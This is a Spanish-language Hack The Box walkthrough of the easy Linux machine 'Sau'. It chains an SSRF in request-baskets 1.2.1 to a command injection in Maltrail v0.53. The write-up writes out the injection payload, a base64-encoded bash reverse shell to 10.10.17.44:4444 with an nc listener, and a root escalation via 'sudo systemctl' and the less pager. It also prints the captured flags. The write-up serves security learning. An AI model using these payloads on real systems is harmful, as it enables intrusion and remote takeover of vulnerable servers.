<- HTB

Sau


6 minutos de lectura

Sau
Hack The Box. Linux. Máquina fácil. Esta máquina tiene una aplicación web que es vulnerable a SSRF, que puede usarse para leer el contenido de un servidor interno, que es vulnerable a inyección de comandos. Las dos vulnerabilidades se pueden encadenar para obtener RCE en la máquina. El usuario de bajos privilegios puede ejecutar systemctl como root usando sudo, lo que conduce a la escalada de privilegios a través de less
  • SO: Linux
  • Dificultad: Fácil
  • Dirección IP: 10.10.11.224
  • Fecha: 08 / 07 / 2023

Escaneo de puertos

# Nmap 7.94 scan initiated as: nmap -sC -sV -o nmap/targeted 10.10.11.224 -p 22,80,8338,55555
Nmap scan report for 10.10.11.224
Host is up (0.073s latency).

PORT      STATE    SERVICE VERSION
22/tcp    open     ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 aa:88:67:d7:13:3d:08:3a:8a:ce:9d:c4:dd:f3:e1:ed (RSA)
|   256 ec:2e:b1:05:87:2a:0c:7d:b1:49:87:64:95:dc:8a:21 (ECDSA)
|_  256 b3:0c:47:fb:a2:f2:12:cc:ce:0b:58:82:0e:50:43:36 (ED25519)
80/tcp    filtered http
8338/tcp  filtered unknown
55555/tcp open     unknown
| fingerprint-strings:
|   FourOhFourRequest:
|     HTTP/1.0 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     X-Content-Type-Options: nosniff
|     Date: Tue, 11 Jul 2023 00:20:29 GMT
|     Content-Length: 75
|     invalid basket name; the name does not match pattern: ^[wd-_\.]{1,250}$
|   GenericLines, Help, Kerberos, LDAPSearchReq, LPDString, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie:  
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest:
|     HTTP/1.0 302 Found
|     Content-Type: text/html; charset=utf-8
|     Location: /web
|     Date: Tue, 11 Jul 2023 00:20:01 GMT
|     Content-Length: 27
|     href="/web">Found</a>.
|   HTTPOptions:
|     HTTP/1.0 200 OK
|     Allow: GET, OPTIONS
|     Date: Tue, 11 Jul 2023 00:20:02 GMT
|_    Content-Length: 0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done -- 1 IP address (1 host up) scanned in 96.81 seconds

La máquina tiene abiertos los tiene 22 (SSH) y 55555 (HTTB). Los puertos 80 (http) y 8338 están filtrados.

Enumeración

Si vamos a http://10.10.11.224:55555, veremos esta aplicación web:

Sau 1

El pie de página muestra que la aplicación web es request-baskets (Versión: 1.2.1). Si investigamos sobre esta aplicación, podemos encontrar que es vulnerable a Server-Side Request Forgery (SSRF).

Server-Side Request Forgery

La vulnerabilidad está publicada en este Gist de GitHub, y explicada aquí.

Básicamente, necesitamos agregar una configuración de “Forward URL” en la API. Esto también se puede hacer desde la interfaz de usuario (después de crear una basket):

Sau 2

Sau 3

Estamos interesados en leer lo que hay en el puerto 80, por lo que pondremos http://127.0.0.1 para realizar una petición GET a ese servicio:

Sau 4

Ahora, si accedemos a nuestra basket, la respuesta mostrará la de http://127.0.0.1. Por lo tanto, podemos leer la respuesta del servidor del puerto 80:

Sau 5

Inyección de comandos

En la respuesta de http://127.0.0.1 vemos Maltrail (v0.53). Nuevamente, esta versión tiene una vulnerabilidad, que es inyección de comandos. Aquí podemos ver por qué es vulnerable y un simple payload para explotar la vulnerabilidad:

curl 'http://hostname:8338/login' --data 'username=;`id > /tmp/bbq`'

En lugar de usar una petición POST, podemos agregar el parámetro username como parámetro de consulta en la URL, como petición GET.

Acceso a la máquina

Iremos directamente y ejecutaremos una reverse shell:

$ echo -n 'bash  -i >& /dev/tcp/10.10.17.44/4444 0>&1' | base64  
YmFzaCAgLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTcuNDQvNDQ0NCAwPiYx

Pondremos esto en “Forward URL”:

http://127.0.0.1/login?username=;`echo+YmFzaCAgLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTcuNDQvNDQ0NCAwPiYx+|+base64+-d+|+bash

Sau 6

Ahora podemos empezar a escuchar con nc y luego acceder a la basket para activar la reverse shell:

$ nc -nlvp 4444
Ncat: Version 7.94 ( https://nmap.org/ncat )
Ncat: Listening on [::]:4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.11.224:42122.
bash: cannot set terminal process group (885): Inappropriate ioctl for device  
bash: no job control in this shell
puma@sau:/opt/maltrail$ script /dev/null -c bash
script /dev/null -c bash
Script started, file is /dev/null
puma@sau:/opt/maltrail$ ^Z
zsh: suspended  ncat -nlvp 4444

$ stty raw -echo; fg
[1]  + continued  ncat -nlvp 4444
                                 reset xterm
puma@sau:/opt/maltrail$ export TERM=xterm
puma@sau:/opt/maltrail$ export SHELL=bash
puma@sau:/opt/maltrail$ stty rows 50 columns 158

¡Estamos dentro!

Enumeración del sistema

En este punto, podemos leer la flag user.txt:

puma@sau:/opt/maltrail$ cd
puma@sau:~$ cat user.txt
65283d8723a45f2e23b5ef238b3fd53c

Además, tenemos permisos de sudo como usuario puma, sin contraseña:

puma@sau:~$ sudo -l
Matching Defaults entries for puma on sau:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin  

User puma may run the following commands on sau:
    (ALL : ALL) NOPASSWD: /usr/bin/systemctl status trail.service

Nos permiten usar systemctl para leer el estado de trail.service:

puma@sau:~$ sudo systemctl status trail.service
 trail.service - Maltrail. Server of malicious traffic detection system
     Loaded: loaded (/etc/systemd/system/trail.service; enabled; vendor preset: enabled)
     Active: active (running) since Mon 2023-07-10 22:43:59 UTC; 1h 57min ago
       Docs: https://github.com/stamparm/maltrail#readme
             https://github.com/stamparm/maltrail/wiki
   Main PID: 885 (python3)
      Tasks: 11 (limit: 4662)
     Memory: 22.4M
     CGroup: /system.slice/trail.service
             ├─ 885 /usr/bin/python3 server.py
             ├─1208 /bin/sh -c logger -p auth.info -t "maltrail[885]" "Failed password for ;`echo YmFzaCAgLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTcuNDQvNDQ0NCAwPiYx | >  
             ├─1209 /bin/sh -c logger -p auth.info -t "maltrail[885]" "Failed password for ;`echo YmFzaCAgLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTcuNDQvNDQ0NCAwPiYx | >
             ├─1217 bash
             ├─1218 bash -i
             ├─1225 script /dev/null -c bash
             ├─1226 bash
             ├─1238 sudo systemctl status trail.service
             ├─1240 systemctl status trail.service
             └─1241 pager

Jul 10 22:43:59 sau systemd[1]: Started Maltrail. Server of malicious traffic detection system.
Jul 11 00:40:58 sau sudo[1236]:     puma : TTY=pts/0 ; PWD=/home/puma ; USER=root ; COMMAND=list
Jul 11 00:41:36 sau sudo[1238]:     puma : TTY=pts/0 ; PWD=/home/puma ; USER=root ; COMMAND=/usr/bin/systemctl status trail.service
Jul 11 00:41:36 sau sudo[1238]: pam_unix(sudo:session): session opened for user root by (uid=0)
lines 1-24/24 (END)

Escalada de privilegios

Este comando aparece en GTFOBins, y se puede abusar junto con sudo para conseguir una shell como root. Podemos usar mi herramienta gtfobins-cli para obtener información sobre cómo escalar privilegios con systemctl y sudo:

$ gtfobins-cli --sudo systemctl

systemctl ==> https://gtfobins.github.io/gtfobins/systemctl/


Sudo

If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.  

TF=$(mktemp)
echo /bin/sh >$TF
chmod +x $TF
sudo SYSTEMD_EDITOR=$TF systemctl edit system.slice

TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "id > /tmp/output"
[Install]
WantedBy=multi-user.target' > $TF
sudo systemctl link $TF
sudo systemctl enable --now $TF

This invokes the default pager, which is likely to be less, other functions may apply.

sudo systemctl
!sh

Como se puede ver, la salida de systemctl usa less, por lo que podemos poner !sh para obtener una shell, tan simple como eso. Como estamos bajo el contexto de sudo, la shell se ejecuta como root:

puma@sau:~$ sudo systemctl status trail.service
 trail.service - Maltrail. Server of malicious traffic detection system
     Loaded: loaded (/etc/systemd/system/trail.service; enabled; vendor preset: enabled)
     Active: active (running) since Mon 2023-07-10 22:43:59 UTC; 1h 57min ago
       Docs: https://github.com/stamparm/maltrail#readme
             https://github.com/stamparm/maltrail/wiki
   Main PID: 885 (python3)
      Tasks: 11 (limit: 4662)
     Memory: 22.4M
     CGroup: /system.slice/trail.service
             ├─ 885 /usr/bin/python3 server.py
             ├─1208 /bin/sh -c logger -p auth.info -t "maltrail[885]" "Failed password for ;`echo YmFzaCAgLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTcuNDQvNDQ0NCAwPiYx | >  
             ├─1209 /bin/sh -c logger -p auth.info -t "maltrail[885]" "Failed password for ;`echo YmFzaCAgLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTcuNDQvNDQ0NCAwPiYx | >
             ├─1217 bash
             ├─1218 bash -i
             ├─1225 script /dev/null -c bash
             ├─1226 bash
             ├─1238 sudo systemctl status trail.service
             ├─1240 systemctl status trail.service
             └─1241 pager

Jul 10 22:43:59 sau systemd[1]: Started Maltrail. Server of malicious traffic detection system.
Jul 11 00:40:58 sau sudo[1236]:     puma : TTY=pts/0 ; PWD=/home/puma ; USER=root ; COMMAND=list
Jul 11 00:41:36 sau sudo[1238]:     puma : TTY=pts/0 ; PWD=/home/puma ; USER=root ; COMMAND=/usr/bin/systemctl status trail.service
Jul 11 00:41:36 sau sudo[1238]: pam_unix(sudo:session): session opened for user root by (uid=0)
!sh
# whoami
root
# bash
root@sau:/home/puma# cd
root@sau:~# cat root.txt
9b91dc59c88ce80907646fd59050541b